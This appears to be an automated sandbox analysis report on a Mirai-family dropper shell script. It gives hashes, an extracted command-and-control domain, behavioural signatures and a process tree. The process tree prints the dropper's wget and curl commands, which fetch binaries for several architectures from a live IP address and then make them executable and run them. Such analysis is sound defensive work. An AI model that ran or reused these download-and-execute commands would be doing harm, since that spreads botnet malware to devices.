Analysis
-
max time kernel
96s -
max time network
150s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
09-11-2024 13:37
Static task
static1
Behavioral task
behavioral1
Sample
update.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
update.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
update.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
update.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
update.sh
-
Size
2KB
-
MD5
2429f698cf97fe571bd6fdc423c2925c
-
SHA1
6a16632e6d5e903b94aac179a258f3ec5452881e
-
SHA256
2a51a31d68eb4fa02088756ceaff39ae3a7e78768fcc48cb9f81c67207be1d92
-
SHA512
9d351efd9ed6bfe34481ca2d23e9f482b68351900fe9c0a756b572a71c6af98c0c1633d198e45ec926ec2fa25aa3448f19f13cb2d7cf87e4203e07927f0fe5f3
Malware Config
Extracted
mirai
OWARI
cnc.carteldesinaloa.ru
Signatures
-
Mirai family
-
Contacts a large (114131) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 11 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 764 chmod 792 chmod 817 chmod 823 chmod 847 chmod 900 chmod 742 chmod 811 chmod 875 chmod 886 chmod 748 chmod -
Modifies Watchdog functionality 1 TTPs 10 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
nuklear.payloadnuklear.payloadnuklear.payloadnuklear.payloadnuklear.payloaddescription ioc process File opened for modification /dev/misc/watchdog nuklear.payload File opened for modification /dev/watchdog nuklear.payload File opened for modification /dev/misc/watchdog nuklear.payload File opened for modification /dev/watchdog nuklear.payload File opened for modification /dev/misc/watchdog nuklear.payload File opened for modification /dev/misc/watchdog nuklear.payload File opened for modification /dev/watchdog nuklear.payload File opened for modification /dev/watchdog nuklear.payload File opened for modification /dev/watchdog nuklear.payload File opened for modification /dev/misc/watchdog nuklear.payload -
Changes its process name 5 IoCs
Processes:
nuklear.payloadnuklear.payloadnuklear.payloadnuklear.payloadnuklear.payloaddescription ioc pid process Changes the process name, possibly in an attempt to hide itself kOsEAfClWXITgCsgaFa 824 nuklear.payload Changes the process name, possibly in an attempt to hide itself oIMDlNcYsxtEGHKrJU 849 nuklear.payload Changes the process name, possibly in an attempt to hide itself eJMDZmLbvsrDCtrDAd 876 nuklear.payload Changes the process name, possibly in an attempt to hide itself fZMDwgfhOMFDlJnBIo 887 nuklear.payload Changes the process name, possibly in an attempt to hide itself DqMDCeMFHeiDMgeNJ 901 nuklear.payload -
Processes:
nuklear.payloadnuklear.payloadnuklear.payloadnuklear.payloadnuklear.payloadcurlcurlcurlcurldescription ioc process File opened for reading /proc/883/cmdline nuklear.payload File opened for reading /proc/904/cmdline nuklear.payload File opened for reading /proc/904/cmdline nuklear.payload File opened for reading /proc/829/cmdline nuklear.payload File opened for reading /proc/678/cmdline nuklear.payload File opened for reading /proc/904/cmdline nuklear.payload File opened for reading /proc/893/cmdline nuklear.payload File opened for reading /proc/428/cmdline nuklear.payload File opened for reading /proc/852/cmdline nuklear.payload File opened for reading /proc/879/cmdline nuklear.payload File opened for reading /proc/898/cmdline nuklear.payload File opened for reading /proc/893/cmdline nuklear.payload File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/717/cmdline nuklear.payload File opened for reading /proc/831/cmdline nuklear.payload File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/825/cmdline nuklear.payload File opened for reading /proc/684/cmdline nuklear.payload File opened for reading /proc/685/cmdline nuklear.payload File opened for reading /proc/708/cmdline nuklear.payload File opened for reading /proc/852/cmdline nuklear.payload File opened for reading /proc/879/cmdline nuklear.payload File opened for reading /proc/883/cmdline nuklear.payload File opened for reading /proc/888/cmdline nuklear.payload File opened for reading /proc/904/cmdline nuklear.payload File opened for reading /proc/852/cmdline nuklear.payload File opened for reading /proc/831/cmdline nuklear.payload File opened for reading /proc/883/cmdline nuklear.payload File opened for reading /proc/905/cmdline nuklear.payload File opened for reading /proc/684/cmdline nuklear.payload File opened for reading /proc/708/cmdline nuklear.payload File opened for reading /proc/830/cmdline nuklear.payload File opened for reading /proc/428/cmdline nuklear.payload File opened for reading /proc/855/cmdline nuklear.payload File opened for reading /proc/710/cmdline nuklear.payload File opened for reading /proc/907/cmdline nuklear.payload File opened for reading /proc/679/cmdline nuklear.payload File opened for reading /proc/850/cmdline nuklear.payload File opened for reading /proc/829/cmdline nuklear.payload File opened for reading /proc/685/cmdline nuklear.payload File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/675/cmdline nuklear.payload File opened for reading /proc/831/cmdline nuklear.payload File opened for reading /proc/829/cmdline nuklear.payload File opened for reading /proc/856/cmdline nuklear.payload File opened for reading /proc/684/cmdline nuklear.payload File opened for reading /proc/865/cmdline nuklear.payload File opened for reading /proc/850/cmdline nuklear.payload File opened for reading /proc/894/cmdline nuklear.payload File opened for reading /proc/898/cmdline nuklear.payload File opened for reading /proc/679/cmdline nuklear.payload File opened for reading /proc/825/cmdline nuklear.payload File opened for reading /proc/884/cmdline nuklear.payload File opened for reading /proc/902/cmdline nuklear.payload File opened for reading /proc/830/cmdline nuklear.payload File opened for reading /proc/892/cmdline nuklear.payload File opened for reading /proc/678/cmdline nuklear.payload File opened for reading /proc/684/cmdline nuklear.payload File opened for reading /proc/707/cmdline nuklear.payload File opened for reading /proc/888/cmdline nuklear.payload File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/877/cmdline nuklear.payload File opened for reading /proc/707/cmdline nuklear.payload File opened for reading /proc/877/cmdline nuklear.payload -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlwgetwgetcurlwgetcurlcurlcurlwgetupdate.shwgetcurlcurlwgetcpwgetcurlwgetcurlwgetcurlwgetcurldescription ioc process File opened for modification /tmp/nuklear.x86_64 wget File opened for modification /tmp/nuklear.x86_64 curl File opened for modification /tmp/nuklear.arm5 wget File opened for modification /tmp/nuklear.arm6 wget File opened for modification /tmp/nuklear.m68k curl File opened for modification /tmp/nuklear.mips wget File opened for modification /tmp/nuklear.x86 curl File opened for modification /tmp/nuklear.arm6 curl File opened for modification /tmp/nuklear.arm7 curl File opened for modification /tmp/nuklear.m68k wget File opened for modification /tmp/nuklear.payload update.sh File opened for modification /tmp/nuklear.mpsl wget File opened for modification /tmp/nuklear.mpsl curl File opened for modification /tmp/nuklear.ppc curl File opened for modification /tmp/nuklear.sh4 wget File opened for modification /tmp/busybox cp File opened for modification /tmp/nuklear.arm wget File opened for modification /tmp/nuklear.arm curl File opened for modification /tmp/nuklear.ppc wget File opened for modification /tmp/nuklear.sh4 curl File opened for modification /tmp/nuklear.x86 wget File opened for modification /tmp/nuklear.arm5 curl File opened for modification /tmp/nuklear.arm7 wget File opened for modification /tmp/nuklear.mips curl
Processes
-
/tmp/update.sh/tmp/update.sh1⤵
- Writes file to tmp directory
PID:710 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:713 -
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.arm2⤵
- Writes file to tmp directory
PID:715 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734 -
/bin/catcat nuklear.arm2⤵PID:741
-
/bin/chmodchmod +x busybox nuklear.arm nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh2⤵
- File and Directory Permissions Modification
PID:742 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵PID:743
-
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.arm52⤵
- Writes file to tmp directory
PID:745 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746 -
/bin/catcat nuklear.arm52⤵PID:747
-
/bin/chmodchmod +x busybox nuklear.arm nuklear.arm5 nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh2⤵
- File and Directory Permissions Modification
PID:748 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵PID:749
-
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.arm62⤵
- Writes file to tmp directory
PID:751 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.arm62⤵
- Writes file to tmp directory
PID:752 -
/bin/catcat nuklear.arm62⤵PID:763
-
/bin/chmodchmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh2⤵
- File and Directory Permissions Modification
PID:764 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵PID:765
-
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.arm72⤵
- Writes file to tmp directory
PID:768 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.arm72⤵
- Writes file to tmp directory
PID:778 -
/bin/catcat nuklear.arm72⤵PID:791
-
/bin/chmodchmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh2⤵
- File and Directory Permissions Modification
PID:792 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵PID:794
-
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.m68k2⤵
- Writes file to tmp directory
PID:798 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.m68k2⤵
- Writes file to tmp directory
PID:807 -
/bin/catcat nuklear.m68k2⤵PID:809
-
/bin/chmodchmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh2⤵
- File and Directory Permissions Modification
PID:811 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵PID:812
-
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:814 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815 -
/bin/catcat nuklear.mips2⤵
- System Network Configuration Discovery
PID:816 -
/bin/chmodchmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh2⤵
- File and Directory Permissions Modification
PID:817 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵PID:818
-
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.mpsl2⤵
- Writes file to tmp directory
PID:820 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821 -
/bin/catcat nuklear.mpsl2⤵PID:822
-
/bin/chmodchmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh2⤵
- File and Directory Permissions Modification
PID:823 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:824 -
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.ppc2⤵
- Writes file to tmp directory
PID:828 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.ppc2⤵
- Writes file to tmp directory
PID:836 -
/bin/chmodchmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.payload nuklear.ppc systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh2⤵
- File and Directory Permissions Modification
PID:847 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:849 -
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.sh42⤵
- Writes file to tmp directory
PID:853 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.sh42⤵
- Writes file to tmp directory
PID:865 -
/bin/chmodchmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.payload nuklear.ppc nuklear.sh4 systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh2⤵
- File and Directory Permissions Modification
PID:875 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:876 -
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.x862⤵
- Writes file to tmp directory
PID:880 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.x862⤵
- Writes file to tmp directory
PID:884 -
/bin/chmodchmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.payload nuklear.ppc nuklear.sh4 nuklear.x86 systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh2⤵
- File and Directory Permissions Modification
PID:886 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:887 -
/usr/bin/wgetwget http://94.156.177.146/389242390482/nuklear.x86_642⤵
- Writes file to tmp directory
PID:891 -
/usr/bin/curlcurl -O http://94.156.177.146/389242390482/nuklear.x86_642⤵
- Writes file to tmp directory
PID:898 -
/bin/chmodchmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.payload nuklear.ppc nuklear.sh4 nuklear.x86 nuklear.x86_64 update.sh2⤵
- File and Directory Permissions Modification
PID:900 -
/tmp/nuklear.payload./nuklear.payload nuklear.payload2⤵
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:901
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
857KB
MD56ffc46165b5d9726a6607f3ea5305589
SHA1ab127220f42e816b413dde0d17031e251a7bc98f
SHA25680d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c
SHA512456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8
-
Filesize
75KB
MD5580cbce6bacb7497bdcec26c1ba42376
SHA1a3003ef3e494492551b911e453085cb058d73aab
SHA25656f7b319fcba3b0dadc568dbb20a0c477b55f57e746e41fb6fc254a959a16ca8
SHA5127138e4086e45c3f2ecf5a881e6c50478ecf53bf1ffbf913f07328acf925fcb813611ebf6a7182c0730472c3d902838389ca72ef741e3b4b4cf483e3cb448c15a